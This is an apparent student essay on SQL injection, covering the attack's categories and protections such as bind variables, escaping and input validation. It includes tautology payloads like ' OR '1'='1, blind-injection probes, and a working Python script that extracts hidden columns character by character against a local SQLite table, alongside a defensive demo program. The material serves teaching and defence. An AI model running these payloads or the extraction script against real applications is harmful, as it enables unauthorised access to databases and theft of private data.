SQL Injection Attacks: Techniques and Protection Mechanisms (Computer Science Essay)

Published: November 9, 2015 Words: 1944

When a user interacts with the web, browsing sites, sending e-mail and posting in online forums, a great deal of data is generated, some of it containing the user's private information. If a third party captures that information with its own tools and techniques, the user's privacy is breached. In the web environment, end-user privacy is one of the most contested legal issues. This paper presents how information leaks through SQL injection attacks and discusses the protection mechanisms against them.

Keywords: - Privacy, Security, Code Injection, SQL Injection, Web Application Security, Malicious Code, Vulnerability.

INTRODUCTION: - As the Internet grows day by day, most people remain unaware of security and privacy. The Internet is a widespread information infrastructure, but it is fundamentally an insecure channel for exchanging information. Web security is the set of rules and measures taken against web security threats; web privacy is the ability to keep end users' information hidden. Most applications today contain a vulnerability (weakness) that makes a threat possible. An attack may succeed because of poor design, configuration mistakes, or poorly written code in the web application. A threat can harm the database, the control of the web application, and its other components, all of which need protection from every type of threat. Code injection in general, and SQL injection in particular, is among the most dangerous attacks on these components.

To build secure applications, security and privacy must be considered from the start, and developers must be aware of them. The main goals of information security are confidentiality, integrity and availability. Confidentiality means that information held on a system is kept from unauthorised people. Integrity means that the information held by an organisation is complete and whole, and is not altered by any unauthorised person. Availability is as important as confidentiality and integrity: information requested by authorised users must always be obtainable.

CODE INJECTION ATTACKS: - Code injection is the term used when malicious code or script is injected into a program or web application from an outside source, for example through an input field the web application provides for end-user input. The attack exploits missing or inaccurate validation of input and output data: the injected code executes as part of the application, and if the attack succeeds it damages an asset or causes an undesirable operation. The attack can be performed against any software, including web applications, in which the weakness is present, whether the mistake was made in the implementation, design, or another phase of the software development life cycle (SDLC). Such weaknesses introduce vulnerabilities that an attacker can exploit to reach unintended data, deny service, or perform incorrect operations. HTML injection, cross-site scripting, SQL injection, shell (command) injection, content spoofing, HTTP response splitting, HTTP request splitting and XML poisoning are some examples of code injection attacks.

SQL Injection: - SQL injection is an attack technique used to exploit an application either to gain unauthorised access to a database or to retrieve information directly from it. An attacker can exploit SQL injection vulnerabilities remotely without any database or application authentication. The attack is straightforward in nature: the attacker passes a malicious string as input to the application in order to steal confidential information. The difficulty lies in exploiting a SQL statement whose text the attacker may not know. Open-source applications, and commercial applications delivered with source code, are easier to target, since the attacker can locate potentially vulnerable statements before the attack instead of having to probe for them [Integrigy, www.net-security.org/dl/.../IntegrigyIntrotoSQLInjectionAttacks.pdf].

Structured Query Language (SQL) is a specialised language for sending queries to databases, and most database products support it because it is a standard. Applications often build SQL statements from user-supplied data. If an application fails to construct these statements properly, an attacker can alter the statement's structure and execute unplanned and potentially hostile commands. Such commands run in the context of the database user the application connects as, so the attacker gains control of every database resource accessible to that user, up to and including, in some products, the ability to execute commands on the hosting system [projects.webappsec.org/w/page/13246963/SQL-Injection].

SQL Injection using Dynamic Strings: -

Most web-based applications take input from the end user and use it to construct a dynamic SQL statement:

Query = "SELECT * FROM student WHERE sname = '" + studentname + "'";   // studentname is copied straight from the request

Example 1 - Dynamically built SQL command string

Consider a web application that takes a student's name as input and displays that student's result using the logic of the query above; for an ordinary name the query returns only that student's row.

Suppose an attacker submits a student name that looks like the following:

Student Name: nikita' OR '1'='1

The SQL command string built from this input would be as follows:

SELECT * FROM student WHERE sname = 'nikita' OR '1'='1'

This query returns every row of the student table, regardless of whether "nikita" is a real user name, because of the OR appended to the WHERE clause: the comparison '1'='1' is always true, so the whole WHERE clause is true for every row. If such a query is used for authentication, the application typically takes the first row returned, and the attacker is logged in as that user, usually the first user in the table.

Blind SQL injection: - Blind SQL injection is the same as ordinary SQL injection except that, when the attacker attempts to exploit the application, the response carries no useful error message: the attacker only sees a generic page chosen by the developer. This makes exploitation harder but not impossible, because the attacker can still extract data by asking the database a series of true/false questions through injected SQL conditions [http://www.owasp.org/index.php/Blind_SQL_Injection].

One type of blind SQL injection forces the database to evaluate a logical condition on an ordinary application screen. If the attacker's input turns the application's query into

SELECT sname FROM student WHERE sname = 'fahim' AND 1=1;

the statement returns the normal page, while

SELECT sname FROM student WHERE sname = 'fahim' AND 1=2;

will most likely produce a different page if the application is vulnerable. The pair of responses tells the attacker that blind SQL injection is possible; from there the attacker devises conditions that evaluate to true or false depending on the contents of another column, or another table, outside the SELECT statement's column list, and reads the data out one true/false answer at a time.
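As an added example (not part of the original essay), the following Python program builds the true/false oracle just described against a constructed SQLite copy of the essay's student table and shows how the attacker turns page responses into data. The table, its rows and the column name rollnum are assumptions for illustration; page_shows_result plays the vulnerable application screen, which reveals only whether a row was found, never the row itself or an error message.

```python
import sqlite3


def make_db():
    """Constructed sample data (assumption): the essay's `student` table with
    made-up names and roll numbers, held in memory."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE student (sname TEXT, rollnum TEXT)")
    con.executemany("INSERT INTO student VALUES (?, ?)",
                    [("nikita", "CS101"), ("fahim", "CS204"), ("raj", "CS305")])
    return con


def page_shows_result(con, sname):
    """The vulnerable 'application screen': the name is concatenated into the
    statement, and the caller only learns whether the page rendered a result
    (True) or the developer's generic page (False). Errors are hidden too."""
    sql = "SELECT sname FROM student WHERE sname = '" + sname + "'"
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # generic error page, indistinguishable from 'no rows'


def is_blind_injectable(con, sname):
    """The probe pair from the text: a true condition must leave the page as it
    was, a false one must change it."""
    base = page_shows_result(con, sname)
    true_probe = page_shows_result(con, sname + "' AND '1'='1")
    false_probe = page_shows_result(con, sname + "' AND '1'='2")
    return base and true_probe and not false_probe


def extract_rollnum(con, sname, maxlen=16):
    """Recover student.rollnum for `sname`, a column that never appears on the
    page, one character at a time with a binary search over its code point.
    length(), substr() and unicode() are SQLite built-ins; MySQL and SQL
    Server spell the last two SUBSTRING() and ASCII()."""
    recovered = ""
    for pos in range(1, maxlen + 1):
        # Explicit length check so the loop stops at the end of the value.
        if not page_shows_result(con, f"{sname}' AND length(rollnum) >= {pos} AND '1'='1"):
            break
        lo, hi = 0, 127  # invariant: the code point lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"{sname}' AND unicode(substr(rollnum,{pos},1)) > {mid} AND '1'='1"
            if page_shows_result(con, probe):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("injectable:", is_blind_injectable(db, "fahim"))
    print("rollnum of fahim:", extract_rollnum(db, "fahim"))
```

Each character costs one length probe plus seven comparisons (a binary search over 0..127), so extracting an entire column is a matter of a few hundred requests; in a real engagement the "page" boundary is found by comparing HTTP responses, and the oracle can equally be a response delay or an error rather than the page content.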

CATEGORIES OF SQL INJECTION ATTACKS

There are four main kinds of SQL Injection attacks

1. SQL Manipulation

2. Code Injection

3. Function Call Injection

4. Buffer Overflows

SQL manipulation usually means modifying the SQL query by altering its WHERE clause. In this class of attack the attacker amends the WHERE clause so that it always evaluates to TRUE [2, www.integrigy.com/.../Integrigy_Oracle_SQL_Injection_Attacks].

In code injection the attacker enters additional SQL statements in the input field instead of valid input; the classic form appends a second statement after a statement terminator (;) so that the database runs it as well. Code injection therefore works only where the database and its driver accept multiple SQL statements per request (stacked queries), which SQL Server, for example, allows and Oracle does not [2].

Function call injection is the insertion of database functions or user-defined functions into a vulnerable SQL statement. Such function calls can be used to make operating-system or network calls from inside the database, or to modify data, to the detriment of its users [2].

Buffer overflows through SQL injection are a subset of function call injection: in several commercial and open-source databases, certain built-in functions have buffer-overflow vulnerabilities, and an injected call to such a function can trigger them [2].

SQL INJECTION METHODS

Of the four types listed above, the most common, SQL manipulation, is illustrated here.

SQL MANIPULATION

The most common type of SQL injection attack is SQL manipulation: the attacker modifies the existing SQL statement by adding elements to its WHERE clause. A simple search application gives an example. It takes a student's roll number as input and displays that student's result, running a query such as:

SELECT * FROM student WHERE rollnum = '<user_input>'

This query returns that student's result. If the attacker submits ' or '1'='1 as the roll number, the statement actually executed becomes:

Figure 1 Inserting Malicious Script into Web Page

SELECT * FROM student WHERE rollnum = '' or '1' = '1'

The WHERE clause is now true for every row, so the query returns every entry in the table, and the attacker gains access to data the application never meant to show.

Figure 2 Result Generated which lists out all the data in database

METHODS FOR PROTECTION AGAINST SQL INJECTION ATTACKS

SQL injection attacks can be prevented with straightforward changes to the server-side code. Client-side checks in the browser may improve usability, but they offer no protection on their own, because an attacker sends requests directly to the server and bypasses them. Developers must be aware of all types of attacks and guard against each of them; every dynamic SQL statement must be parameterised or sanitised, since a single unprotected query can compromise the application, its data, or the database server.

TAKING USER INPUT FROM PREDEFINED CHOICES

Figure 3 Predefined Choices Instead of Text Field

Offering the user a fixed set of choices (a drop-down list or radio buttons) instead of a free-text field limits what an honest user can submit, but it secures the application only if the server re-checks the submitted value against the same list: an attacker can edit the request and send any string regardless of what the form offered. With that server-side check in place the attacker cannot insert custom queries or harmful script that would disturb the integrity of the database. This is a simple yet effective way to curb web application attacks, and it requires only small changes to the server-side code.

BIND VARIABLES MECHANISM

Bind variables are another technique for controlling SQL injection attacks: the SQL text is sent to the database with placeholders, and the user's values are supplied separately, so they are treated purely as data and never parsed as part of the statement. Using bind variables also improves web application performance, because the database can reuse the parsed statement. Developers should use bind variables in all SQL statements. In Java the mechanism is the PreparedStatement class, which implements the bind-variable concept:

PreparedStatement pstate;
pstate = con.prepareStatement("SELECT * FROM student WHERE rollnum = ?");
pstate.setString(1, sroll);   // sroll holds the user-supplied roll number; it is sent as data, never parsed as SQL
ResultSet rs = pstate.executeQuery();

Parameterized Statements

To defend against SQL injection, user input must never be concatenated directly into SQL queries. Parameterised statements (bind variables) are the preferred defence; only where they cannot be used should user input be sanitised or filtered instead, and then with great care.

Sanitising means passing the user input through an escaping function before it is placed in the statement, such as PHP's mysql_real_escape_string($user_input) (from the old mysql extension, deprecated in PHP 5.5 and removed in PHP 7, where mysqli_real_escape_string or PDO::quote is the equivalent). The function prefixes a backslash (\) to the characters that have special meaning to MySQL (NUL, \n, \r, \, ', " and Ctrl-Z), so a quote inside the input can no longer close the string literal and the malicious script is not executed. Note that this protects only values placed inside quoted string literals; input inserted into a numeric context or an identifier position is not protected, which is one more reason to prefer parameterised statements. The result of the function can be seen in figure 4.

Figure 4 Result of Filtering Function

INPUT VALIDATION

Input validation is the simplest defence against SQL injection. Every string parameter passed to the application should be validated, including hidden form fields and other values the browser sends that the user never types, since an attacker can alter those just as easily. Where a bind variable is not used, special database characters must be removed or escaped.

In most databases the single quote character and a few other special characters are the main problem, and the simplest method is to escape every single quote. Client-side scripting may do this in the browser for convenience, but the same check must be repeated on the server, because an attacker can disable or bypass the script and submit the raw string directly.

Figure 5 The Use of Client Side Scripting to Avoid Special Characters
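The following Python program is an added example, not code from the original essay, that carries Example 1 and the SQL manipulation attack above through to the defences of this section on a constructed in-memory SQLite database: the dynamic string, quote escaping in a string context and its failure in a numeric context, bind variables (the ? placeholder of sqlite3 is the counterpart of the Java PreparedStatement), integer validation of the roll number, and a server-side allow-list standing in for the predefined choices of a drop-down. The student table and its rows are assumptions; escape_quotes is a minimal stand-in for a function such as mysql_real_escape_string, not that function.

```python
import sqlite3


def make_db():
    """Constructed sample data (assumption): the essay's `student` table with
    made-up rows, held in memory."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE student (sname TEXT, rollnum INTEGER)")
    con.executemany("INSERT INTO student VALUES (?, ?)",
                    [("nikita", 101), ("fahim", 204), ("raj", 305)])
    return con


def lookup_dynamic(con, sname):
    """Example 1 as the essay shows it: the user's string is concatenated into
    the statement, so a quote in the input changes the statement's structure."""
    sql = "SELECT * FROM student WHERE sname = '" + sname + "'"
    return con.execute(sql).fetchall()


def escape_quotes(value):
    """Minimal escaping stand-in: doubling a single quote is the portable SQL
    way to keep it inside a string literal (MySQL also accepts a backslash)."""
    return value.replace("'", "''")


def lookup_escaped_string(con, sname):
    """Escaping is enough only while the value sits between quotes."""
    sql = "SELECT * FROM student WHERE sname = '" + escape_quotes(sname) + "'"
    return con.execute(sql).fetchall()


def lookup_escaped_numeric(con, rollnum):
    """The same escaping fails in a numeric context: there is no quote for the
    attacker to break out of, so `0 OR 1=1` is still a tautology."""
    sql = "SELECT * FROM student WHERE rollnum = " + escape_quotes(rollnum)
    return con.execute(sql).fetchall()


def lookup_bound(con, sname):
    """Bind variable: the statement text is fixed and the value travels
    separately, so it is compared as data and never parsed as SQL."""
    return con.execute("SELECT * FROM student WHERE sname = ?", (sname,)).fetchall()


def lookup_bound_numeric(con, rollnum):
    """Input validation plus bind variable: a roll number must be an integer,
    so anything else is rejected before it reaches the database."""
    try:
        number = int(rollnum)
    except ValueError:
        return []
    return con.execute("SELECT * FROM student WHERE rollnum = ?", (number,)).fetchall()


# Server-side copy of the choices a drop-down would offer (assumed keys).
SORT_COLUMNS = {"name": "sname", "roll": "rollnum"}


def list_sorted(con, sort_key):
    """Identifiers such as column names cannot be bound, so a predefined
    choice is enforced by looking the submitted key up in an allow-list and
    using the server's own string, never the client's."""
    column = SORT_COLUMNS.get(sort_key)
    if column is None:
        raise ValueError("unknown sort key: %r" % sort_key)
    return con.execute("SELECT * FROM student ORDER BY " + column).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "nikita' OR '1'='1"
    print("dynamic:", lookup_dynamic(db, payload))                    # all three rows
    print("escaped string:", lookup_escaped_string(db, payload))      # no rows
    print("escaped numeric:", lookup_escaped_numeric(db, "0 OR 1=1"))  # all three rows again
    print("bound:", lookup_bound(db, payload))                        # no rows
    print("bound numeric:", lookup_bound_numeric(db, "0 OR 1=1"))     # rejected, no rows
```

The numeric case is the one worth remembering: an escaping function that is perfectly adequate for the quoted string of Example 1 does nothing for a roll number concatenated without quotes, whereas the bound form is safe in both contexts; the ORDER BY case shows the complementary limit of bind variables, which cover values but not identifiers, and that is where the server-side allow-list of predefined choices belongs.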

Conclusion

Code injection attacks, and SQL injection in particular, are among the most notorious issues in web security. Controlling malicious SQL in web applications and maintaining end-user privacy remain key challenges for web developers, who must take these issues seriously whenever a website is backed by a database. This paper has described how an attacker exploits a web application with SQL injection to obtain confidential information from its database, and has presented several protection mechanisms against the attack.